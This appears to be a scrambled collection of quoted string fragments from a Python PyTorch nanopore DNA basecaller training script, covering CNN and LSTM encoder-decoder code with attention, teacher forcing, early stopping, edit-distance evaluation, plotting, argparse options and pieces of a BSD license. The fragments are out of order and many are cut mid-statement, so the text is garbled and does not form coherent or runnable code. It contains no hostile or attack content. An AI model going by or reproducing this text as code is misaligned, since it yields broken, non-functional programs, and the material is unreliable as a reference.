"A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR",
"\"T\", 4: \"<EOF>\", 5: \"<PAD>\"} # A=0, C=1, G=2, T=3, EOF=4 script_dir =",
"print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds is not None: input_x_val =",
"of updates= \", int((len(train_loader) * n_epochs)*0.5)) # Backward pass loss.backward() #clipping_value = 1",
"forcing or not teacher_force = random.random() < teacher_forcing_ratio # put on position: seq,",
"# self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self): # This is what",
"def get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10, read_idx, batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y,",
"float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration + 1)) * 100), \"Val Loss:",
"if (val_ds != None) and (updates % make_validation == 0): # or (updates",
"model if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates) if early_stopping.early_stop: print(\"Early stopping\") break if",
"forget_bias != \"None\" and \"lstm_encoder\" in name: print(name,param.data.size()) n = param.size(0) # forget",
"The Encoder # ----------- class LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__()",
"mode_type, beam_width) # seq_length x batch_size x out_size return out_decoder, labels_sorted, sorted_len_target #",
"self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim *",
"# indices of not padded elements loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss +=",
"p: n = matrix_param[p].shape[0] # input gate start, end = 0, n//4 input_biases[idx_b,",
"Distance\") plt.legend() plt.title(\"Edit distance vs. updates from validation set\") if pdf is not",
"seq = pred[idx] seq_target = target[idx] encoded_pred = [] for p in seq:",
"0 total_num_chars = 0 with torch.no_grad(): for iteration_val, data_val in enumerate(val_loader): batch_x_val =",
"b), where a and b both have shape (num_layers, batch_size, hidden_dim). if self.bidirectional:",
"acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation",
"= args.epochs make_validation = args.make_validation teacher = args.tf_ratio reduced_TF = args.reduced_tf earlyStopping =",
"columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path +",
"OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)",
"input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias",
"* 30) total_train_loss = 0 loss_iteration = [] acc_iteration = [] editd_iteration =",
"dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell,",
"loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation",
":].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train += acc acc_iteration.append(acc)",
"port=1): super(LSTMCellDecoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias = bias self.i2h",
"enumerate(target_lengths): length = int(length.item()) seq = pred[idx] seq_target = target[idx] encoded_pred = []",
"= in_lstm[negative_idx, : , :] # [batch, seq_len, input_dim] lab_len = lab_len[negative_idx] labels",
"port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional",
"in the sequence won't be shown to the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(),",
"reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val += acc_val val_acc.append(acc_val) if editD:",
"set val_losses = [] val_acc = [] val_editd = [] model.eval() total_ed =",
"= nn.Linear(hidden_size, 4 * hidden_size, bias=bias) # self.reset_parameters() def reset_parameters(self): std = 1.0",
"seq_len_cnn = seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, : , :] # [batch, seq_len, input_dim]",
"lstm_in_unroll, hidden = self.lstm_unroll(input, hidden) # [batch size, seq, hidden dim] lstm_in_unroll =",
"from trainings set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))),",
"if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\") ax",
"if \"bias\" in name and \"lstm\" in name and \"linear\" not in name:",
"max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy())) # this locator puts ticks at regular intervals",
"idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch",
"on GPU mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int, default=256,",
"self.dropout = dropout # Define the LSTM layer if self.bidirectional: if self.attention: self.lstm_unroll",
"self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting ############################# ########################################### #### sort by decreasing target length",
"def trainNet(model, train_ds, optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000,",
"lab_len = lab_len[negative_idx] labels = labels[negative_idx, :] labels10 = labels10[negative_idx, :, :] encoder_hidden,",
"bottom=0, top=2, hspace=0.2, wspace=0.5) i = 0 for p, label in zip(input, [\"input",
"gate\"]): i += 1 ax = fig.add_subplot(2, 2, i) for epoch in p.keys():",
"model has {count_parameters(model12):,} trainable parameters') f = open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile +",
"print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle)",
"output_val = torch.transpose(output_val, 0, 1).contiguous() # input for LSTM seq_length x out_size #",
"__init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder = False, bidirectional = False, port=1,",
"w.data.uniform_(-std, std) def forward(self, x, hidden): h, c = hidden h = h.view(x.size(0),",
"for x in seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target) editd += result num_chars +=",
"ed = 0 # ed2 = old_ed # # old_ed = ed2 #",
"= SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set = read_data[0] val_set = read_data[1] train_set = [train_set[0].cuda(port),",
"dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim = hidden,",
"NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS",
"c = hidden h = h.view(x.size(0), -1) c = c.view(x.size(0), -1) x =",
"bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: if",
"11], help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda",
"= torch.transpose(in_lstm, 1, 2) # input for LSTM batch_size x seq_length x input_size",
"as handle: read_data = pickle.load(handle) save_files_path = script_dir + '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir",
"prediction #if teacher forcing, use actual next token as next input #if not,",
"loss.backward() #clipping_value = 1 #arbitrary number of your choosing if clipping_value != \"None\":",
"attn_applied: b, 1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq, feature), lstm_in_unroll,",
"1.05)) plt.title(\"{} {}\".format(label, title)) if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def",
"in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm, 1, 2) # input for",
"reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train += loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1) ==",
"bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) # Define",
"running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates]",
"divmod(end-start, 3600) minutes, seconds = divmod(rem, 60) print(\"=\" * 100) checkpoint = {",
"batch_size=batch_size, shuffle=True) if val_ds != None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val,",
"idx, u in enumerate(x_len): idx_b = 0 matrix_param = dict_weights[u] for idx_p, p",
"in m.named_parameters(): if \"weight\" in name and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input,",
"decresed, # and if it has, it will make a checkpoint of the",
"on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val))",
"mode) output = torch.transpose(output, 0, 1).contiguous() # input for LSTM seq_length x out_size",
"= nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define the LSTM layer lstm_out, hidden = self.lstm(packed_seq)",
"for i in max_for: # Stop looping if we got to the last",
"shape of self.hidden: (a, b), where a and b both have shape (num_layers,",
"seq_len, input_dim] # pack_padded_sequence so that padded items in the sequence won't be",
"+ \" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target",
"encoded_target = ''.join([vocab[int(x.item())] for x in seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target) editd +=",
"to the pickle input file.\") parser.add_argument('-o', '--output', required = True, help=\"Output folder name\")",
"acc_iteration if editD: dict_training_editd[epoch] = editd_iteration writer.close() if earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"])",
"= args.output port = args.gpu_port SEED = args.set_seed batch = args.batch_size epochs =",
"#Our batch shape for input x is [batch, seq_len, input_dim] def __init__(self, input_dim,",
"32 is a good default value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel,",
"seq_len, input_dim] def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder = False, bidirectional=False,",
"+= acc running_acc_train += acc acc_iteration.append(acc) #if editD: # if updates % make_validation",
"!= None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping:",
"= 0.0 running_editd_val = 0.0 updates = 0 heatmap_g = None heatmap_w =",
"unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 =",
"loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest",
"if self.bidirectional: hidden1 = hidden[0] hidden2 = hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2)",
"(seq*batch) # Target nicht one-hot encoden reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1)",
"train_ds[4] read_train = train_ds[5] #Get training data train_loader = get_train_loader_trainVal(input_x, signal_len, input_y, label_len,",
"#print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :] # get only batches that are NOT",
"model(inputs_val, seq_len_val, 0, labels_val, lab_len_val, labels10_val, labels_val.size(1), mode) output_val = torch.transpose(output_val, 0, 1).contiguous()",
"f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model",
"# ----------- # * CNN-Encoder # * LSTM-Encoder # * LSTM-Decoder # The",
"self.port=port self.attention = attention self.dropout = dropout # Define the LSTM layer if",
"and matrix_param[p].shape[1] == 1: # (256, 1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else:",
"self.output_dim).cuda(self.port) # [max. target length, batch size, hidden dim] max_in_batch = int(max(true_y_len.cpu())) start_seq",
"EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \"\"\" import h5py import",
"init_hidden(self): # This is what we'll initialise our hidden state as return (torch.zeros(self.num_layers,",
"dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget,",
"acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation",
"out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0],",
"torch.no_grad(): for iteration_val, data_val in enumerate(val_loader): batch_x_val = data_val[0] batch_y_val = data_val[1] seq_len_val",
"sgd = False out_classes = 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True",
"torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths): #hidden = self.init_hidden() # Forward pass",
"len(p[epoch].detach().numpy())) # this locator puts ticks at regular intervals if epoch == 0:",
"3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend()",
":, i] # batch, features, seq len if self.attention: # ATTENTION MECHANISM attn_weights",
"layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim,",
"unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :, :] return hidden_original, unpacked_original",
"Define the LSTM layer lstm_out, hidden = self.lstm(packed_seq) # [seq_len, batch, input_dim] #",
"= data_val[2] lab_len_val = data_val[3] batch_y10_val = data_val[4] inputs_val, labels_val, labels10_val = Variable(batch_x_val,",
"ord=2) # cell gate start, end = n//2, n//2 + n//4 input_biases[idx_b+2, idx]",
"max_idx_val)) f.close() def basecalling(argv): parser = make_argparser() args = parser.parse_args(argv[1:]) infile = args.input",
"value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization,",
":]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :, :] return hidden_original,",
"training iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher",
"default=False) # LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0,",
"print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher forcing ratio=\",",
"dict_validation_acc2[updates] = np.mean(val_acc) valid_loss = running_loss_val / float(iteration_val + 1) running_loss_train = 0.0",
"input_dim] def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder = False, bidirectional=False, port=1,",
"0 epoch_editd_val = 0 epoch_editd = 0 print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs))",
"n//2, n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder",
"3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\")",
"= fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error",
"dict_gradients]]) def count_parameters(model): return sum(p.numel() for p in model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m):",
"= 32 is a good default value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] ,",
"= ed2 # epoch_editd += ed # running_editd_train += ed # editd_iteration.append(ed2) #",
"# shape of self.hidden: (a, b), where a and b both have shape",
"= 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True # Load data dict_classes",
"\"w\") if editD: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings",
"help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11, 11], help=\"Kernel sizes in Encoder-CNN\")",
"hidden h = h.view(h.size(0), -1) c = c.view(c.size(0), -1) x = x.view(x.size(0), -1)",
"cellgate = F.tanh(cellgate) outgate = F.sigmoid(outgate) cy = (forgetgate * c) + (ingate",
"initialize the early_stopping object early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in",
"self.lstm_encoder = lstm_encoder self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions of",
"f = open(fname, \"w\") if editD: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation",
"########################################### #### sort by decreasing target length sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1",
"decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") # early",
"name: for b in [\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name + \".\" + b)",
"plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val, editd_train, editd_val =",
"to the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define the LSTM layer",
"else: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train],",
"default=\"0\", help=\"Set forget gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"self.bidirectional = bidirectional self.port=port self.attention = attention self.dropout = dropout # Define the",
"cer, updates) #dict_training_editd2[updates] = running_editd_train #/ float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration)",
"+= ed_val total_num_chars += num_char_ref if editD: cer = float(total_ed) / total_num_chars if",
"weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,} trainable parameters') f =",
"make_validation == 0): # or (updates == n_epochs-1)): if reduced_TF: #if updates >",
"= labels10[sorted_idx_target, :, :] # batch, out_size, seq_len ########################################### ##### Decoder ############################# ###########################################",
"= read_data[0] val_set = read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)]",
"i in max_for: # Stop looping if we got to the last element",
"/ reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train += acc acc_iteration.append(acc) #if editD: # if",
"top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if",
"# ----------- class Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder",
"= pred[idx] seq_target = target[idx] encoded_pred = [] for p in seq: if",
"BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED",
"#self.attn = nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else:",
"label_len_val = val_ds[4] read_val = val_ds[5] input_x = train_ds[0] input_y = train_ds[1] input_y10",
"and b both have shape (num_layers, batch_size, hidden_dim). if self.bidirectional: hidden1 = hidden[0]",
"running_loss_val += loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val",
"strtobool from polyleven import levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping import EarlyStopping from cnn",
"labels, labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size x out_size",
"teacher_forcing_ratio # Evaluation on the validation set val_losses = [] val_acc = []",
"running_editd_val = 0.0 print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration",
"= F.sigmoid(outgate) cy = (forgetgate * c) + (ingate * cellgate) hy =",
"LSTM layer # shape of lstm_in: [batch, input_dim] # shape of lstm_out: [seq_len,",
"units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str,",
"OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE",
"max_idx_val)) else: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train],",
"torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder = False,",
"optimizer.zero_grad() batch_x = data[0] batch_y = data[1] seq_len = data[2] lab_len = data[3]",
"% make_validation == 0: # ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2 =",
"self.init_hidden() # Forward pass through LSTM layer # shape of lstm_in: [batch, seq_len,",
"dropout_on = args.dropout_cnn dropout_input = args.dropout_input dropout_probability = args.drop_prob call = args.call lr",
"1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long())",
"# forget gate start, end = n//4, n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end],",
"self.hidden_size = hidden_size self.bias = bias self.i2h = nn.Linear(input_size, 4 * hidden_size, bias=bias)",
"def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required = True, help=\"File path",
"{} dict_training_loss2 = {} dict_validation_loss2 = {} dict_training_acc2 = {} dict_validation_acc2 = {}",
"= c.view(x.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings gates = self.i2h(x)",
"batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y,",
"lab_len = data[3] batch_y10 = data[4] #Wrap them in a Variable object inputs,",
"{0:.4f}\".format((epoch_editd / float(iteration + 1)))) if updates % make_validation == 0: print(\"=\" *",
"if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\") if",
"gate start, end = n//2 + n//4, n input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end],",
"= args.attention dropout = args.dropout # CNN input_bias_cnn = args.input_bias_cnn strides = args.strides",
"# [batch, seq_len, input_dim] # pack_padded_sequence so that padded items in the sequence",
"\"<PAD>\"} # A=0, C=1, G=2, T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) # script directory",
"(h1, h2) batch_size = true_y_len.size(0) max_for = range(max_label_len) outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port)",
"= float(total_ed) / total_num_chars if updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses),",
"ord=2) if split_LSTMbiases and \"bias\" in p and \"lstm\" in p and \"linear\"",
"'--hidden_units', type=int, default=256, help=\"Number of hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number",
"args.early_stop patience_earlyStop = args.patience weight_decay = args.weight_decay #0.01 #0.01 clipping_value = args.gradient_clip #",
"number of layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and decoder must have equal",
"plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from validation set\") if editD:",
"= val_ds[2] signal_len_val = val_ds[3] label_len_val = val_ds[4] read_val = val_ds[5] input_x =",
"in enumerate(target_lengths): length = int(length.item()) seq = pred[idx] seq_target = target[idx] encoded_pred =",
"start = time.time() out12 = trainNet( model12, train_ds = train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value,",
"not in p: n = matrix_param[p].shape[0] # input gate start, end = 0,",
"one-hot encoden reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels !=",
"self.bidirectional = bidirectional self.port = port self.dropout=dropout # Define the LSTM layer self.lstm",
"early_stopping object early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {}",
"= open(fname, \"w\") if editD: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings",
"parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) return",
"All rights reserved. Redistribution and use in source and binary forms, with or",
">= true seq length if i >= true_y_len[-1].item() and len(true_y_len) > 1: not_padded_batches",
"editD: # if updates % make_validation == 0: # ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels,",
"from sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard import SummaryWriter import itertools import seaborn as",
"'--gpu_port', type=int, default=1, help=\"Port on GPU mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set seed\")",
"output dim] top1 = input_decoder.argmax(1) # get argmax of prediction #if teacher forcing,",
"f.write(infile + \" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue",
"torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def get_train_loader(tensor_x, sig_len,",
